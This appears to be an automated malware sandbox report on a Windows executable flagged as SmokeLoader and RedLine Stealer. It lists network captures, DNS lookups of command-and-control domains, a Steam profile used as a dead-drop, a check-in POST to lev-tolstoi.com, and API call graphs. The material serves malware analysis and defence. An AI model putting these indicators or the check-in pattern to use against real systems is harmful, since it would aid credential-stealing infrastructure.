                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.615832090 CET49733443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.615832090 CET49733443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.615832090 CET49733443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.671418905 CET49739443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.671456099 CET44349739172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.671529055 CET49739443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.672038078 CET49739443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.672050953 CET44349739172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.926337957 CET49733443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:24.926373959 CET44349733172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:25.426774979 CET49739443192.168.2.9172.67.157.254

                                                                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:17.451107025 CET5729353192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:17.588783026 CET53572931.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:17.593871117 CET4980753192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:17.731132984 CET53498071.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:17.733544111 CET6254753192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:17.872001886 CET53625471.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:17.878638983 CET5427553192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:18.016024113 CET53542751.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:18.312819958 CET5714553192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:18.703264952 CET53571451.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:18.706968069 CET5521953192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:18.852054119 CET53552191.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:18.854285002 CET6391353192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:18.990926027 CET53639131.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:18.994328976 CET6253553192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:19.132860899 CET53625351.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:19.136590004 CET6361853192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:19.274616957 CET53636181.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:19.278156996 CET6416353192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:19.501619101 CET53641631.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.228873968 CET6123953192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.366327047 CET53612391.1.1.1192.168.2.9

                                                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:17.451107025 CET192.168.2.91.1.1.10xad5bStandard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:17.593871117 CET192.168.2.91.1.1.10x340dStandard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:17.733544111 CET192.168.2.91.1.1.10x787aStandard query (0)discokeyus.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:17.878638983 CET192.168.2.91.1.1.10x7c91Standard query (0)necklacebudi.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:18.312819958 CET192.168.2.91.1.1.10xdf6bStandard query (0)energyaffai.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:18.706968069 CET192.168.2.91.1.1.10xfc80Standard query (0)aspecteirs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:18.854285002 CET192.168.2.91.1.1.10xbabcStandard query (0)sustainskelet.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:18.994328976 CET192.168.2.91.1.1.10x1b4dStandard query (0)crosshuaht.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:19.136590004 CET192.168.2.91.1.1.10xec3aStandard query (0)rapeflowwj.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:19.278156996 CET192.168.2.91.1.1.10xd957Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.228873968 CET192.168.2.91.1.1.10x44c1Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:17.588783026 CET1.1.1.1192.168.2.90xad5bName error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:17.731132984 CET1.1.1.1192.168.2.90x340dName error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:17.872001886 CET1.1.1.1192.168.2.90x787aName error (3)discokeyus.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:18.016024113 CET1.1.1.1192.168.2.90x7c91Name error (3)necklacebudi.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:18.703264952 CET1.1.1.1192.168.2.90xdf6bName error (3)energyaffai.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:18.852054119 CET1.1.1.1192.168.2.90xfc80Name error (3)aspecteirs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:18.990926027 CET1.1.1.1192.168.2.90xbabcName error (3)sustainskelet.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:19.132860899 CET1.1.1.1192.168.2.90x1b4dName error (3)crosshuaht.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:19.274616957 CET1.1.1.1192.168.2.90xec3aName error (3)rapeflowwj.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:19.501619101 CET1.1.1.1192.168.2.90xd957No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.366327047 CET1.1.1.1192.168.2.90x44c1No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 23, 2024 07:01:22.366327047 CET1.1.1.1192.168.2.90x44c1No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                      • steamcommunity.com
                                                                                                                                                                                                                                                                      • lev-tolstoi.com

                                                                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      0192.168.2.94972223.55.153.1064433440C:\Users\user\Desktop\NQbg5Ht2hW.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-23 06:01:21 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                                                                                                                      2024-12-23 06:01:22 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 06:01:21 GMT
                                                                                                                                                                                                                                                                      Content-Length: 35121
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Set-Cookie: sessionid=ea8140059e74463eb3aab1fd; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                      2024-12-23 06:01:22 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                                      2024-12-23 06:01:22 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                                      Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                                      2024-12-23 06:01:22 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                                      Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      1192.168.2.949733172.67.157.2544433440C:\Users\user\Desktop\NQbg5Ht2hW.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-23 06:01:23 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                      2024-12-23 06:01:23 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                                                                                                      2024-12-23 06:01:24 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 06:01:24 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=mauloucni696l0jhth8p97aado; expires=Thu, 17 Apr 2025 23:48:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BoTS%2BuExDYFH6bGNQBTWoV8p8dZE9UsC1%2FB2VsLCFJsd4CMaKCgk5f4SaW%2Bv%2BSdJHABo88mgfW4JqUd6NPtFyQXENJpoi%2Fzdw74SXoou55ADR0DJOj%2Ft%2BoMxTmazaD7sX8U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                      CF-RAY: 8f6623042eb55e7a-EWR
                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1674&min_rtt=1669&rtt_var=637&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1704611&cwnd=214&unsent_bytes=0&cid=6fbd91eca8ff24e0&ts=1040&x=0"
                                                                                                                                                                                                                                                                      2024-12-23 06:01:24 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 2ok
                                                                                                                                                                                                                                                                      2024-12-23 06:01:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                                      Start time:01:01:15
                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\NQbg5Ht2hW.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\NQbg5Ht2hW.exe"
                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                      File size:296'448 bytes
                                                                                                                                                                                                                                                                      MD5 hash:D1137063CCA03F3D3079C8C4DB839B95
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1716537575.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                                                      Start time:01:01:24
                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 660
                                                                                                                                                                                                                                                                      Imagebase:0x2e0000
                                                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                        Execution Coverage:1.5%
                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:34.1%
                                                                                                                                                                                                                                                                        Signature Coverage:36.5%
                                                                                                                                                                                                                                                                        Total number of Nodes:85
                                                                                                                                                                                                                                                                        Total number of Limit Nodes:7
                                                                                                                                                                                                                                                                        execution_graph 25980 43aa80 25983 43d810 25980->25983 25982 43aa8a RtlAllocateHeap 25984 43d830 25983->25984 25984->25982 25984->25984 25985 40c583 CoInitializeSecurity 25986 43aaa0 25987 43aab3 25986->25987 25988 43aac4 25986->25988 25989 43aab8 RtlFreeHeap 25987->25989 25989->25988 25990 43c767 25992 43c790 25990->25992 25991 43c80e 25992->25991 25994 43c1f0 LdrInitializeThunk 25992->25994 25994->25991 25995 43cce6 25996 43cd00 25995->25996 25998 43cd6e 25996->25998 26002 43c1f0 LdrInitializeThunk 25996->26002 26001 43c1f0 LdrInitializeThunk 25998->26001 26000 43ce4d 26001->26000 26002->25998 26003 470000 26006 470006 26003->26006 26007 470015 26006->26007 26010 4707a6 26007->26010 26011 4707c1 26010->26011 26012 4707ca CreateToolhelp32Snapshot 26011->26012 26013 4707e6 Module32First 26011->26013 26012->26011 26012->26013 26014 4707f5 26013->26014 26015 470005 26013->26015 26017 470465 26014->26017 26018 470490 26017->26018 26019 4704a1 VirtualAlloc 26018->26019 26020 4704d9 26018->26020 26019->26020 26020->26020 26021 43c58a 26023 43c460 26021->26023 26022 43c5f4 26023->26022 26023->26023 26026 43c1f0 LdrInitializeThunk 26023->26026 26025 43c54d 26026->26025 26027 43c2c8 26028 43c2e0 26027->26028 26028->26028 26029 43ccaf GetForegroundWindow 26028->26029 26030 43ccbe 26029->26030 26031 71003c 26032 710049 26031->26032 26046 710e0f SetErrorMode SetErrorMode 26032->26046 26037 710265 26038 7102ce VirtualProtect 26037->26038 26040 71030b 26038->26040 26039 710439 VirtualFree 26044 7104be 26039->26044 26045 7105f4 LoadLibraryA 26039->26045 26040->26039 26041 7104e3 LoadLibraryA 26041->26044 26043 7108c7 26044->26041 26044->26045 26045->26043 26047 710223 26046->26047 26048 710d90 26047->26048 26049 710dad 26048->26049 26050 710dbb GetPEB 26049->26050 26051 710238 VirtualAlloc 26049->26051 26050->26051 26051->26037 26052 408850 26054 40885f 26052->26054 26053 408acf ExitProcess 26054->26053 26055 408ab8 26054->26055 26056 40891c GetCurrentProcessId GetCurrentThreadId 26054->26056 26065 43c160 FreeLibrary 26055->26065 26057 408941 26056->26057 26058 408945 SHGetSpecialFolderPathW GetForegroundWindow 26056->26058 26057->26058 26060 408a3d 26058->26060 26060->26055 26064 40c550 CoInitializeEx 26060->26064 26065->26053 26066 435972 26067 43599b 26066->26067 26069 4359c4 26067->26069 26070 43c1f0 LdrInitializeThunk 26067->26070 26070->26067 26071 43e7d0 26072 43e800 26071->26072 26075 43e87f 26072->26075 26077 43c1f0 LdrInitializeThunk 26072->26077 26073 43e94e 26075->26073 26078 43c1f0 LdrInitializeThunk 26075->26078 26077->26075 26078->26073 26084 40e71a CoUninitialize CoUninitialize 26085 40a03d 26086 40a130 26085->26086 26086->26086 26089 40acf0 26086->26089 26088 40a17f 26090 40ad80 26089->26090 26092 40ada5 26090->26092 26093 43c180 RtlAllocateHeap RtlFreeHeap 26090->26093 26092->26088 26093->26090

                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                        Function 0040ACF0 Relevance: 9.2, Strings: 7, Instructions: 430COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 84 40acf0-40ad78 85 40ad80-40ad89 84->85 85->85 86 40ad8b-40ad9e 85->86 88 40b012-40b019 86->88 89 40ada5-40ada7 86->89 90 40b0e7-40b0f0 86->90 91 40b0f7-40b0fd 86->91 92 40adac-40afc7 86->92 93 40b09d-40b0b7 86->93 94 40b01e-40b096 call 407f00 86->94 95 40b0ff-40b10a 86->95 118 40b367-40b373 88->118 120 40b351-40b358 89->120 90->91 90->95 96 40b341-40b344 90->96 97 40b1c4-40b1d1 90->97 98 40b268-40b289 call 43dbf0 90->98 99 40b1eb-40b1fa 90->99 100 40b22b-40b235 90->100 101 40b330 90->101 102 40b212-40b224 90->102 103 40b332-40b335 90->103 104 40b295-40b2b4 90->104 105 40b2f5-40b31b 90->105 106 40b375 90->106 107 40b2d6-40b2ee call 43c180 90->107 108 40b256-40b263 90->108 109 40b1d8-40b1df 90->109 110 40b359-40b364 90->110 111 40b33c 90->111 112 40b23c-40b254 call 43dbf0 90->112 113 40b37c 90->113 114 40b31d 90->114 115 40b0be-40b0e2 call 43dbf0 90->115 116 40b141-40b164 91->116 121 40afd0-40aff2 92->121 93->110 93->115 94->90 94->91 94->93 94->95 94->96 94->97 94->98 94->99 94->100 94->101 94->102 94->103 94->104 94->105 94->106 94->107 94->108 94->109 94->110 94->111 94->112 94->113 94->114 94->115 117 40b110-40b13a 95->117 142 40b34b 96->142 97->98 97->106 97->109 97->110 97->113 97->115 98->104 141 40b201-40b20b 99->141 100->98 100->106 100->108 100->109 100->110 100->112 100->113 100->115 102->96 102->98 102->100 102->101 102->103 102->104 102->105 102->106 102->107 102->108 102->109 102->110 102->111 102->112 102->113 102->114 102->115 103->96 103->98 103->106 103->108 103->109 103->110 103->111 103->112 103->113 103->115 137 40b2bd-40b2cf 104->137 125 40b322-40b328 105->125 106->113 107->96 107->98 107->101 107->103 107->105 107->106 107->108 107->109 107->110 107->111 107->112 107->113 107->114 107->115 108->96 109->99 110->118 111->96 112->108 134 40b383 113->134 114->125 115->110 130 40b170-40b1a1 116->130 117->117 129 40b13c-40b13f 117->129 118->120 121->121 126 40aff4-40afff 121->126 125->101 143 40b002-40b00b 126->143 129->116 130->130 139 40b1a3-40b1bd 130->139 134->134 137->96 137->98 137->101 137->103 137->105 137->106 137->107 137->108 137->109 137->110 137->111 137->112 137->113 137->114 137->115 139->96 139->97 139->98 139->99 139->100 139->101 139->102 139->103 139->104 139->105 139->106 139->107 139->108 139->109 139->110 139->111 139->112 139->113 139->114 139->115 141->96 141->98 141->100 141->101 141->102 141->103 141->104 141->105 141->106 141->107 141->108 141->109 141->110 141->111 141->112 141->113 141->114 141->115 142->120 143->88 143->90 143->91 143->93 143->94 143->95 143->96 143->97 143->98 143->99 143->100 143->101 143->102 143->103 143->104 143->105 143->106 143->107 143->108 143->109 143->110 143->111 143->112 143->113 143->114 143->115
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: &K M$&wXy$'sZu$/O_q$Jk"m$e7o9$h? !
                                                                                                                                                                                                                                                                        • API String ID: 0-2986092683
                                                                                                                                                                                                                                                                        • Opcode ID: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
                                                                                                                                                                                                                                                                        • Instruction ID: 590b8efa2b06f5e02b6b835ab0c7a13339e1eb4ce69d4453d365afcab8c45654
